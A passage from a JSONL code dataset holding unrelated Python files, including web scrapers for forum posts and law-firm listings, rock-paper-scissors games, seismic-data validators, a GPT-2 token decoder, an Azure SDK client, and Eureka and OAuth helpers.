data['last_edit_first_topic']:\n break;\n\n topicIndex = 0\n while topicIndex < len(topicIds):\n topicId = topicIds[topicIndex]\n logging.info(\"Topic id: {0}\".format(topicId))\n try:\n topic = memoizer.scrapeTopic(topicId, since, until)\n\n topicPageNum = 1\n while topicPageNum <= topic['num_pages']:\n logging.info(\"Topic page number: {0}\".format(topicPageNum))\n try:\n dataMessages = memoizer.scrapeMessages(topic['id'], topicPageNum, since, until)\n messages = dataMessages['messages']\n logging.info(\"Found {0} messages\".format(len(messages)))\n\n if len(messages) == 0 and \\\n dataMessages['page_first_message'] != None and \\\n dataMessages['page_first_message'] >= untilDate:\n break\n\n for message in messages:\n results.append(message)\n if len(results) == everyN:\n print(results)\n # print(json.dumps(results))\n sys.stdout.flush()\n results = []\n except Exception as e:\n logging.exception(e)\n time.sleep(sleepTime)\n topicPageNum = topicPageNum - 1\n finally:\n topicPageNum = topicPageNum + 1\n\n except Exception as e:\n logging.exception(e)\n time.sleep(sleepTime)\n topicIndex = topicIndex - 1\n finally:\n topicIndex = topicIndex + 1\n\n except Exception as e:\n logging.exception(e)\n time.sleep(sleepTime)\n boardPageNum = boardPageNum - 1\n finally:\n boardPageNum = boardPageNum + 1\n\n if len(results) > 0:\n print(results)\n sys.stdout.flush()\n 
results = []\n\n        doneMessage = \"All done\"\n        print(doneMessage)\n\n    except Exception as argv:\n        print('Arguments parser error: ' + str(argv))\n    finally:\n        pass\n\nif __name__ == '__main__':\n    main(sys.argv[1:])","sub_path":"scrape_board_topics.py","file_name":"scrape_board_topics.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"575096592","text":"# fetches a jp2 tile from disk, uploads it to a buffer, and uses jp2k_mem to decode it\nimport glymur\nimport numpy as np\n\n\nif __name__ == '__main__':\n    fname = 'data/example.jp2'\n    orig_img_jp2 = glymur.Jp2k(fname)\n    orig_img = orig_img_jp2[:]\n\n    with open(fname, 'r') as img_data:\n        img_buffer_jp2 = img_data.read()\n\n    img_buffer_jp2 = np.frombuffer(img_buffer_jp2, dtype=np.uint8)\n    img_jp2 = glymur.Jp2kMem(img_buffer_jp2)\n    #img_jp2.verbose = True\n    img = img_jp2[:]\n\n    assert np.all(img == orig_img)\n","sub_path":"glymur/test/test_jp2k_mem.py","file_name":"test_jp2k_mem.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"96487016","text":"# 1: rock\n# 2: scissors\n# 3: paper\n# rock beats scissors\n# scissors beats paper\n# paper beats rock\n# the player types rock (石头), scissors (剪刀), or paper (布) on the keyboard\n# the computer randomly generates the number 1, 2, or 3\n# if the computer generates 1, convert it to rock\n# if the computer generates 2, convert it to scissors\n# if the computer generates 3, convert it to paper\n\n# compare to decide the winner\nimport random\n# pc is the move the computer will play: 1, 2, or 3\npc = random.randint(1, 3)\n# the numbers 1, 2, 3 need to be converted to the corresponding strings\n# variable a holds the result of converting the number to a string\na = None\nif pc == 1:\n    a = \"石头\"\nelif pc == 2:\n    a = \"剪刀\"\nelse:\n    a = \"布\"\n\n# player is the move the human plays: rock, scissors, or paper\nplayer = input(\"请输入石头或者剪刀或者布\")\n\nif (a == \"石头\" and player == \"剪刀\") or (a == \"剪刀\" and player == \"布\") or (a == \"布\" and player == \"石头\"):\n    print(\"电脑出了%s, 我出了%s, 电脑赢了\" % (a, player))\nelif (a == player):\n    print(\"电脑出了%s, 我出了%s, 平局\" % (a, player))\nelse:\n    print(\"电脑出了%s, 我出了%s, 我赢了\" % (a, player))","sub_path":"04、 python编程/day02/3-code/25-猜拳游戏-改进版.py","file_name":"25-猜拳游戏-改进版.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"347284338","text":"from random import choice\n# List of play options\noptions = ['Rock', 'Paper', 'Scissors', 'Lizard', 'Spock']\n\noutcomes = {\n    ('Scissors', 'Paper'): 'cuts',\n    ('Paper', 'Rock'): 'covers',\n    ('Rock', 'Lizard'): 'crushes',\n    ('Lizard', 'Spock'): 'poisons',\n    ('Spock', 'Scissors'): 'smashes',\n    ('Scissors', 'Lizard'): 'decapitates',\n    ('Lizard', 'Paper'): 'eats',\n    ('Paper', 'Spock'): 'disproves',\n    ('Spock', 'Rock'): 'vaporizes',\n    ('Rock', 'Scissors'): 'crushes'\n}\n\nplay = True\n\nwhile play is True:\n\n    computer = choice(options)\n    roll = input('Please select; Rock, Paper, Scissors, Lizard or Spock\\n')\n    roll = roll.lower().capitalize()\n\n    # Makes sure that player makes valid choice\n    while roll not in options:\n        roll = input('Please select; Rock, Paper, Scissors, Lizard or Spock\\n')\n\n    print(f'Player: {roll}')\n    print(f'Computer: {computer}')\n\n    if (roll, computer) in outcomes:\n        print(f'You win! {roll} {outcomes[roll, computer]} {computer}.')\n    elif (computer, roll) in outcomes:\n        print(f'You lose! {computer} {outcomes[computer, roll]} {roll}.')\n    else:\n        print('Tie!')\n\n    print('Would you like to play again? 
(Y/N)')\n    answer = input()\n\n    if answer.lower() == 'y' or answer.lower() == 'yes':\n        play = True\n    else:\n        break\n","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"100534261","text":"from urllib.request import Request, urlopen\nfrom bs4 import BeautifulSoup\nfrom docx import Document\nfrom collections import OrderedDict\nimport os, csv, re, json\n\n# URL template kept for reference only; the real URL is rebuilt with an f-string inside mkfiles()\nlawyers_com = \"https://www.lawyers.com/all-legal-issues/{city}/{state}/law-firms{pg}/?={category}\"\n\n# state_abbrs = OrderedDict(zip(state_abbs.values(), state_abbs.keys()))  # disabled: state_abbs is never defined in this file\n\nos.chdir('/Users/RavneetKapoor/Desktop/qrtools/attsearch/csv_files')\ndefault_path = os.getcwd()  # os.chdir() returns None, so capture the working directory explicitly\n\n#t_states = t_state_cities.keys()\n\nfl = open(\"../us_states_cities.json\")\nfl = fl.read()\nstates_cities = json.loads(fl)\n\nstates = list(states_cities.keys())[3:7]\n\n# aliases expected by the mkfiles() call at the bottom of this file\nt_state_cities = states_cities\nt_states = states\n\nt_categories = [\n    \"Appeals\"\n]\n\ndef mk_rqst(lnk):\n    req = Request(lnk, headers={'User-Agent': 'Mozilla/5.0'})\n    webpage = urlopen(req).read()\n    return BeautifulSoup(webpage, 'lxml')\n\ndef get_phone_num(contact):\n    phone = \"\"  # default so the except branches cannot leave phone unbound\n    try:\n        phone = next(contact.find(\"a\", {\"class\": \"opt-d-phone\"}).stripped_strings)\n        if phone == \"View Phone #\":\n            try:\n                phone = contact.find(\"li\", {\"class\":\"srl-phone\"}).a.attrs[\"data-phonenum\"]\n            except:\n                print(\"Not there *******************************************************\")\n    except:\n        print(\"Not there *******************************************************\")\n    return phone\n\n\n# in csv_files directory\n\ndef mkfiles(arr_states, dct, dflt_pth):\n    with open(\"totals_for_each_state.csv\", mode=\"w\") as stt_ttl_sheet:\n        stt_writer = csv.writer(stt_ttl_sheet, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n        stt_writer.writerow([\"State\", \"Total\"])\n        for state in arr_states:\n            try:\n                stt_ttl = 0\n                os.makedirs(f\"{state}\")\n                os.chdir(f\"{state}\")\n                # location: ... attsearch/csv_files/{state}\n                with open(f\"totals_for_each_city.csv\", mode=\"w\") as city_ttl_sheet:\n                    city_writer = csv.writer(city_ttl_sheet, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n                    city_writer.writerow([\"City\", \"Total\"])\n                    print(f\"State: {state}\"*10)\n                    if len(state.split(\" \")) > 1: state_lnk = \"-\".join(state.lower().split(\" \"))\n                    else: state_lnk = state.lower()\n                    for city in dct[state]:\n                        os.makedirs(f\"{city}\")\n                        print(f\"City: {city}\"*10)\n                        if len(city.split(\" \")) > 1: city_lnk = \"-\".join(city.lower().split(\" \"))\n                        else: city_lnk = city.lower()\n                        os.chdir(f\"{city}\")\n                        # location: ... 
attsearch/csv_files/{state}/{city}\n city_ttl = 0\n for category in t_categories:\n\n cat_ttl = 0\n \n with open(f\"{category}.csv\", mode='w') as sheet:\n\n writer = csv.writer(sheet, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n writer.writerow([\"Firm\", \"Address\", \"Phone\"])\n\n print(f\"Category: {category}\"*10)\n\n if len(category.split(\" \")) > 1: category_lnk = \"-\".join(category.lower().split(\" \"))\n else: category_lnk = category.lower()\n pg = \"\"\n lawyers_com = f\"https://www.lawyers.com/all-legal-issues/{city_lnk}/{state_lnk}/law-firms{pg}/?={category_lnk}\"\n try:\n\n soup = mk_rqst(lawyers_com)\n\n #len(list(soup.find(\"ul\", {\"class\": \"pagination\"}).find_all(\"li\"))) > 0:\n try:\n pgs = int(soup.find(\"ul\", {\"class\": \"pagination\"}).find_all(\"li\")[7].text)\n except:\n pgs = 1\n\n for pg in range(pgs+1):\n pg = f\"-p{str(pg)}\"\n lawyers_com = f\"https://www.lawyers.com/all-legal-issues/{city_lnk}/{state_lnk}/law-firms{pg}/?={category_lnk}\"\n soup = mk_rqst(lawyers_com)\n for contact in soup.find_all(\"div\", {\"class\": \"search-results-list\"}):\n try:\n firm = next(contact.find(\"h2\", {\"class\": \"srl-name\"}).a.stripped_strings)\n loc = next(contact.find(\"p\", {\"class\": \"srl-serving\"}).stripped_strings)\n except:\n print(\"error with link: \", lawyers_com, \"\\n\", \"Page: \", pg, \"\\n\", \"Cat: \", category)\n continue\n phone = get_phone_num(contact)\n writer.writerow([firm, loc, phone])\n print(\"Firm: \", firm)\n print(\"Location: \", loc)\n print(\"Phone Num: \", phone)\n cat_ttl += 1\n except:\n continue\n city_ttl = cat_ttl\n city_writer.writerow([city, city_ttl])\n stt_ttl += city_ttl\n os.chdir(\"..\")\n # location: ... attsearch/csv_files/{state}\n os.chdir(\"..\")\n # location: ... 
attsearch/csv_files/\n stt_writer.writerow([state, stt_ttl])\n except:\n continue\n\nmkfiles(t_states, t_state_cities, default_path)","sub_path":"lawyer_com_search.py","file_name":"lawyer_com_search.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"2421546","text":"import load_paths\nimport extract_queries as EQ\nimport pd_to_text\nimport pandas as pd\n\nconfig_file = \"config.yml\"\ndatapaths = load_paths.load_configs(config_file)\n\nqueries = EQ.get_all(datapaths) #load dictionary with queries for all sets\n\n\n#create dataframes for each of the sets for original query to related question\ntrain_df = EQ.org_rel_df(queries['train'][1], queries['train'][0])\n\ntest_df = EQ.org_rel_df(queries['test'][1], queries['test'][0])\n\ndev_df = EQ.org_rel_df(queries['dev'][1], queries['dev'][0])\n\n\n\ntrain_df.to_csv(\"data_preprocessing/data_dumps/QQ_train.csv\")\ntest_df.to_csv(\"data_preprocessing/data_dumps/QQ_test-17.csv\")\ndev_df.to_csv(\"data_preprocessing/data_dumps/QQ_dev.csv\")\n\npd_to_text.return_text(train_df, \"train\")\npd_to_text.return_text(test_df, \"test\")\npd_to_text.return_text(dev_df, \"dev\")\n\n","sub_path":"feature_extraction/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"22049194","text":"import math\nimport logging\nfrom datetime import date\n\nnTypes = {0: \"Nordic Event\",\n\t\t1: \"Nordic Main Header\",\n\t\t2: \"Nordic Macroseismic Header\",\n\t\t3: \"Nordic Comment Header\",\n\t\t5: \"Nordic Error Header\",\n\t\t6: \"Nordic Waveform Header\",\n\t\t8: \"Nordic Phase Data\"}\n\nclass values():\n\tmaxInt = 9223372036854775807 \n\ndef validateInteger(val, valueName, low, high, limits, nType):\n\tif val == \"\":\n\t\treturn True\n\n\ttry:\n\t\tint(val)\n\texcept:\t\t\n\t\tmsg = \"Validation Error - {0}: {1} is not an integer! ({2})\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, val))\n\t\treturn False\n\n\tif int(val) < low and limits:\n\t\tmsg = \"Validation Error - {0}: {1} is smaller than {2}! ({3})\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, low, val))\n\t\treturn False\n\n\tif int(val) > high and limits:\n\t\tmsg = \"Validation Error - {0}: {1} is larger than {2}! ({3})\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, high, val))\n\t\treturn False\n\n\treturn True\n\ndef validateFloat(val, valueName, low, high, limits, nType):\n\tif val == \"\":\n\t\treturn True\n\n\ttry:\n\t\tfloat(val)\n\texcept:\t\t\n\t\tmsg = \"Validation Error - {0}: {1} is not an float! ({2})\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, val))\n\t\treturn False\n\n\tif math.isnan(float(val)):\n\t\tmsg = \"Validation Error - {0}: {1} is {2} which is not allowed!\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, val))\n\t\treturn False\n\n\tif math.isinf(float(val)):\n\t\tmsg = \"Validation Error - {0}: {1} is {2} which is not allowed!\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, val))\n\t\treturn False\n\n\tif float(val) < low and limits:\n\t\tmsg = \"Validation Error - {0}: {1} is smaller than {2}! ({3})\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, low, val))\n\t\treturn False\n\n\tif float(val) > high and limits:\n\t\tmsg = \"Validation Error - {0}: {1} is larger than {2}! 
({3})\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, high, val))\n\t\treturn False\n\n\treturn True\n\ndef validateString(string, stringName, minlen, maxlen, listOfAllowed, isList, nType):\t\n\tif string == \"\":\n\t\treturn True\n\n\tif string not in listOfAllowed and isList:\n\t\tmsg = \"Validation Error - {0}: {1} not in the list of allowed strings! ({2})\\nAllowed:\\n\"\n\t\tfor allowed in listOfAllowed:\n\t\t\tmsg += \" -\" + allowed + \"\\n\"\n\t\tlogging.error(msg.format(nTypes[nType], stringName, string))\n\t\treturn False\n\n\tif minlen > -1 and len(string) < minlen:\n\t\tmsg = \"Validation Error - {0}: {1} is shorter than the minimum allowed length {2}! ({3})\"\n\t\tlogging.error(msg.format(nTypes[nType], stringName, minlen, string))\n\t\treturn False\n\n\tif maxlen > -1 and len(string) > maxlen:\n\t\tmsg = \"Validation Error - {0}: {1} is longer than the maximum allowed length {2}! ({3})\"\n\t\tlogging.error(msg.format(nTypes[nType], stringName, maxlen, string))\n\t\treturn False\n\n\treturn True\n\ndef validateDate(dateS, dateName, nType):\n\tif dateS == \"\":\n\t\treturn True\n\t\n\ttry:\n\t\tdate(year=int(dateS[:4].strip()), month=int(dateS[5:7].strip()), day=int(dateS[8:].strip()))\n\texcept:\n\t\tmsg = \"Validation Error - {0}: {1} is not parsable into date!({2})\"\n\t\tlogging.error(msg.format(nTypes[nType], dateName, dateS))\n\t\treturn False\n\n\treturn True\n\n\ndef fixDate(nordic):\n\tif nordic.date[5] == \" \":\n\t\tnordic.date = nordic.date[:5] + \"0\" + nordic.date[6:]\n\tif nordic.date[8] == \" \":\n\t\tnordic.date = nordic.date[:8] + \"0\" + nordic.date[9:]\n\n","sub_path":"nor2qml/validation/validationTools.py","file_name":"validationTools.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"481571370","text":"import pandas as pd\n\nimport json\nwith open('encoder.json', 'r') as f:\n    data = json.load(f)\n\ndef bytes_to_unicode():\n    \"\"\"\n    Returns list of utf-8 byte and a corresponding list of unicode strings.\n    The reversible bpe codes work on unicode strings.\n    This means you need a large # of unicode characters in your vocab if you want to avoid UNKs.\n    When you're at something like a 10B token dataset you end up needing around 5K for decent coverage.\n    This is a significant percentage of your normal, say, 32K bpe vocab.\n    To avoid that, we want lookup tables between utf-8 bytes and unicode strings.\n    And avoids mapping to whitespace/control characters the bpe code barfs on.\n    \"\"\"\n    bs = list(range(ord(\"!\"), ord(\"~\")+1))+list(range(ord(\"¡\"), ord(\"¬\")+1))+list(range(ord(\"®\"), ord(\"ÿ\")+1))\n    cs = bs[:]\n    n = 0\n    for b in range(2**8):\n        if b not in bs:\n            bs.append(b)\n            cs.append(2**8+n)\n            n += 1\n    cs = [chr(n) for n in cs]\n    return dict(zip(bs, cs))\n\ndecoder = {v:k for k,v in data.items()}\nbyte_encoder = bytes_to_unicode()\nbyte_decoder = {v:k for k, v in byte_encoder.items()}\n\ndef decoder_text(tokens):\n    errors='replace'\n    text = ''.join([decoder[token] for token in tokens])\n    text = bytearray([byte_decoder[c] for c in text]).decode('utf-8', errors=errors)\n    return text","sub_path":".ipynb_checkpoints/decodeLogits-checkpoint.py","file_name":"decodeLogits-checkpoint.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"63398918","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright 
(c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------\n\nfrom copy import deepcopy\nfrom typing import Any, TYPE_CHECKING\n\nfrom azure.core.rest import HttpRequest, HttpResponse\nfrom azure.mgmt.core import ARMPipelineClient\n\nfrom . import models\nfrom ._configuration import PeeringManagementClientConfiguration\nfrom ._serialization import Deserializer, Serializer\nfrom .operations import (\n CdnPeeringPrefixesOperations,\n ConnectionMonitorTestsOperations,\n LegacyPeeringsOperations,\n LookingGlassOperations,\n Operations,\n PeerAsnsOperations,\n PeeringLocationsOperations,\n PeeringManagementClientOperationsMixin,\n PeeringServiceCountriesOperations,\n PeeringServiceLocationsOperations,\n PeeringServiceProvidersOperations,\n PeeringServicesOperations,\n PeeringsOperations,\n PrefixesOperations,\n ReceivedRoutesOperations,\n RegisteredAsnsOperations,\n RegisteredPrefixesOperations,\n RpUnbilledPrefixesOperations,\n)\n\nif TYPE_CHECKING:\n # pylint: disable=unused-import,ungrouped-imports\n from azure.core.credentials import TokenCredential\n\n\nclass PeeringManagementClient(\n PeeringManagementClientOperationsMixin\n): # pylint: disable=client-accepts-api-version-keyword,too-many-instance-attributes\n \"\"\"Peering Client.\n\n :ivar cdn_peering_prefixes: CdnPeeringPrefixesOperations operations\n :vartype cdn_peering_prefixes: azure.mgmt.peering.operations.CdnPeeringPrefixesOperations\n :ivar legacy_peerings: LegacyPeeringsOperations operations\n :vartype legacy_peerings: azure.mgmt.peering.operations.LegacyPeeringsOperations\n :ivar looking_glass: LookingGlassOperations operations\n :vartype looking_glass: azure.mgmt.peering.operations.LookingGlassOperations\n :ivar operations: Operations operations\n :vartype operations: azure.mgmt.peering.operations.Operations\n :ivar peer_asns: PeerAsnsOperations operations\n :vartype peer_asns: azure.mgmt.peering.operations.PeerAsnsOperations\n :ivar peering_locations: PeeringLocationsOperations operations\n :vartype peering_locations: azure.mgmt.peering.operations.PeeringLocationsOperations\n :ivar registered_asns: RegisteredAsnsOperations operations\n :vartype registered_asns: azure.mgmt.peering.operations.RegisteredAsnsOperations\n :ivar registered_prefixes: RegisteredPrefixesOperations operations\n :vartype registered_prefixes: azure.mgmt.peering.operations.RegisteredPrefixesOperations\n :ivar peerings: PeeringsOperations operations\n :vartype peerings: azure.mgmt.peering.operations.PeeringsOperations\n :ivar received_routes: ReceivedRoutesOperations operations\n :vartype received_routes: azure.mgmt.peering.operations.ReceivedRoutesOperations\n :ivar connection_monitor_tests: ConnectionMonitorTestsOperations operations\n :vartype connection_monitor_tests:\n azure.mgmt.peering.operations.ConnectionMonitorTestsOperations\n :ivar peering_service_countries: PeeringServiceCountriesOperations operations\n :vartype peering_service_countries:\n azure.mgmt.peering.operations.PeeringServiceCountriesOperations\n :ivar peering_service_locations: PeeringServiceLocationsOperations operations\n :vartype peering_service_locations:\n azure.mgmt.peering.operations.PeeringServiceLocationsOperations\n :ivar prefixes: PrefixesOperations operations\n :vartype 
prefixes: azure.mgmt.peering.operations.PrefixesOperations\n :ivar peering_service_providers: PeeringServiceProvidersOperations operations\n :vartype peering_service_providers:\n azure.mgmt.peering.operations.PeeringServiceProvidersOperations\n :ivar peering_services: PeeringServicesOperations operations\n :vartype peering_services: azure.mgmt.peering.operations.PeeringServicesOperations\n :ivar rp_unbilled_prefixes: RpUnbilledPrefixesOperations operations\n :vartype rp_unbilled_prefixes: azure.mgmt.peering.operations.RpUnbilledPrefixesOperations\n :param credential: Credential needed for the client to connect to Azure. Required.\n :type credential: ~azure.core.credentials.TokenCredential\n :param subscription_id: The Azure subscription ID. Required.\n :type subscription_id: str\n :param base_url: Service URL. Default value is \"https://management.azure.com\".\n :type base_url: str\n :keyword api_version: Api Version. Default value is \"2022-10-01\". Note that overriding this\n default value may result in unsupported behavior.\n :paramtype api_version: str\n \"\"\"\n\n def __init__(\n self,\n credential: \"TokenCredential\",\n subscription_id: str,\n base_url: str = \"https://management.azure.com\",\n **kwargs: Any\n ) -> None:\n self._config = PeeringManagementClientConfiguration(\n credential=credential, subscription_id=subscription_id, **kwargs\n )\n self._client = ARMPipelineClient(base_url=base_url, config=self._config, **kwargs)\n\n client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}\n self._serialize = Serializer(client_models)\n self._deserialize = Deserializer(client_models)\n self._serialize.client_side_validation = False\n self.cdn_peering_prefixes = CdnPeeringPrefixesOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.legacy_peerings = LegacyPeeringsOperations(self._client, self._config, self._serialize, self._deserialize)\n self.looking_glass = LookingGlassOperations(self._client, self._config, self._serialize, self._deserialize)\n self.operations = Operations(self._client, self._config, self._serialize, self._deserialize)\n self.peer_asns = PeerAsnsOperations(self._client, self._config, self._serialize, self._deserialize)\n self.peering_locations = PeeringLocationsOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.registered_asns = RegisteredAsnsOperations(self._client, self._config, self._serialize, self._deserialize)\n self.registered_prefixes = RegisteredPrefixesOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.peerings = PeeringsOperations(self._client, self._config, self._serialize, self._deserialize)\n self.received_routes = ReceivedRoutesOperations(self._client, self._config, self._serialize, self._deserialize)\n self.connection_monitor_tests = ConnectionMonitorTestsOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.peering_service_countries = PeeringServiceCountriesOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.peering_service_locations = PeeringServiceLocationsOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.prefixes = PrefixesOperations(self._client, self._config, self._serialize, self._deserialize)\n self.peering_service_providers = PeeringServiceProvidersOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.peering_services = PeeringServicesOperations(\n self._client, 
self._config, self._serialize, self._deserialize\n )\n self.rp_unbilled_prefixes = RpUnbilledPrefixesOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n\n def _send_request(self, request: HttpRequest, **kwargs: Any) -> HttpResponse:\n \"\"\"Runs the network request through the client's chained policies.\n\n >>> from azure.core.rest import HttpRequest\n >>> request = HttpRequest(\"GET\", \"https://www.example.org/\")\n \n >>> response = client._send_request(request)\n \n\n For more information on this code flow, see https://aka.ms/azsdk/dpcodegen/python/send_request\n\n :param request: The network request you want to make. Required.\n :type request: ~azure.core.rest.HttpRequest\n :keyword bool stream: Whether the response payload will be streamed. Defaults to False.\n :return: The response of your network call. Does not do error handling on your response.\n :rtype: ~azure.core.rest.HttpResponse\n \"\"\"\n\n request_copy = deepcopy(request)\n request_copy.url = self._client.format_url(request_copy.url)\n return self._client.send_request(request_copy, **kwargs)\n\n def close(self):\n # type: () -> None\n self._client.close()\n\n def __enter__(self):\n # type: () -> PeeringManagementClient\n self._client.__enter__()\n return self\n\n def __exit__(self, *exc_details):\n # type: (Any) -> None\n self._client.__exit__(*exc_details)\n","sub_path":"sdk/peering/azure-mgmt-peering/azure/mgmt/peering/_peering_management_client.py","file_name":"_peering_management_client.py","file_ext":"py","file_size_in_byte":9222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"556694455","text":"import logging\nfrom typing import Dict, Any\n\nimport py_eureka_client.eureka_client as eureka_client\n\nfrom cidemiasecurity.clients.alternate_worker import _walker_generator\nfrom cidemiasecurity.config.loader import get_config\nfrom cidemiasecurity.security.random import generate_nonce\n\nlog = logging.getLogger(__file__)\n\n\ndef internal_get_config(current_value, name, env_name, raise_error: bool = False, caster=None):\n if not current_value:\n current_value = get_config(env_name, None)\n if raise_error and not current_value:\n log.error(f\"Halt registering Eureka client. Either give the {name} or set {env_name} environment\")\n raise ValueError\n log.warning(f\"No {name}. Will use {current_value} read from {env_name} environment\")\n\n return caster(current_value) if (caster and current_value) else current_value\n\n\nasync def init_client(eureka_url: str = None, application_name: str = None, instance_port: int = None,\n instance_id: str = None, instance_host: str = None, instance_ip: str = None):\n \"\"\"\n The flowing code will register your server to eureka server and also start to send heartbeat every 30 seconds\n :param eureka_url: str -> The URL of the Eureka server\n :param application_name: str -> The application name\n :param instance_port: int -> The instance port\n :param instance_id: str -> The instance id\n :param instance_host: str -> The instance host\n :param instance_ip: str -> The instance ip\n :return:\n \"\"\"\n try:\n eureka_url = internal_get_config(eureka_url, \"Eureka URL\", \"EUREKA_URL\", True)\n application_name = internal_get_config(application_name, \"Application name\", \"APP_NAME\", True)\n instance_port = internal_get_config(instance_port, \"instance port given\", \"APP_PORT\", False, int)\n except ValueError as e:\n log.error(f\"Error when starting Eureka. 
Lack of parameter: {str(e)}\")\n return False\n if not instance_id:\n instance_id = f\"{application_name}:{generate_nonce(21)}\"\n log.warning(f\"Not instance id given. Will use {instance_id}\")\n if not instance_host:\n instance_host = internal_get_config(None, \"Domain name\", \"DOMAIN_NAME\", False) or \"\"\n log.info(f\"Registering {application_name} to Eureka: {eureka_url}\")\n eureka_client.init(eureka_server=eureka_url, app_name=application_name, instance_port=instance_port,\n instance_id=instance_id, instance_host=instance_host, ha_strategy=eureka_client.HA_STRATEGY_STICK)\n\n\nclass MicroServiceClient:\n \"\"\"\n Base class for handling calls to micro services\n \"\"\"\n def __init__(self, service_name: str, base_url: str):\n self.service_name = service_name\n self.base_url = base_url\n self.default_headers = {\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"}\n\n def _get_url(self, suffix_url, params: Dict[str, Any] = None, headers: Dict[str, Any] = None):\n # return eureka_client.do_service(self.service_name, self.base_url + suffix_url, headers=headers, return_type=\"json\")\n return eureka_client.walk_nodes(self.service_name, self.base_url + suffix_url,\n walker=_walker_generator(\"get\", params=params, headers=headers))\n\n def _post_url(self, suffix_url, data, headers=None):\n return eureka_client.walk_nodes(self.service_name, self.base_url + suffix_url,\n walker=_walker_generator(\"post\", json=data, headers=headers))\n\n def _put_url(self, suffix_url, data, headers=None):\n return eureka_client.walk_nodes(self.service_name, self.base_url + suffix_url,\n walker=_walker_generator(\"put\", json=data, headers=headers))\n\n def _delete_url(self, suffix_url, data, headers=None):\n return eureka_client.walk_nodes(self.service_name, self.base_url + suffix_url,\n walker=_walker_generator(\"delete\", json=data, headers=headers))\n","sub_path":"cidemiasecurity/clients/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"370112763","text":"# -*- coding: utf-8 -*-\n# oauth flow in simple words: http://pyoauth.readthedocs.org/en/latest/guides/oauth1.html\n\nfrom requests_oauthlib import OAuth1Session\nfrom six.moves import input\n\nfrom settings import CLIENT_KEY, CLIENT_SECRET, API_HOST\n\n\ndef get_api():\n request_token_url = '{}/oauth/initiate'.format(API_HOST)\n authorization_base_url = '{}/oauth/authorize'.format(API_HOST)\n access_token_url = '{}/oauth/token'.format(API_HOST)\n callback_uri = 'http://127.0.0.1/cb' # can be pretty random in this case\n\n # initiate Oauth by fetching request token\n api = OAuth1Session(\n CLIENT_KEY, client_secret=CLIENT_SECRET, callback_uri=callback_uri)\n api.fetch_request_token(request_token_url)\n\n # ask user to visit authorization URL and paste response\n authorization_url = api.authorization_url(authorization_base_url)\n print('Please go here and authorize: ')\n print(authorization_url)\n redirect_response = input('Paste the full redirect URL here: ')\n\n # parse authorization response (contains callback_uri) and access token\n api.parse_authorization_response(redirect_response)\n api.fetch_access_token(access_token_url)\n return api\n","sub_path":"oauth_dance.py","file_name":"oauth_dance.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"364561195","text":"import shutil\r\n\r\nPIN_COUNT = 
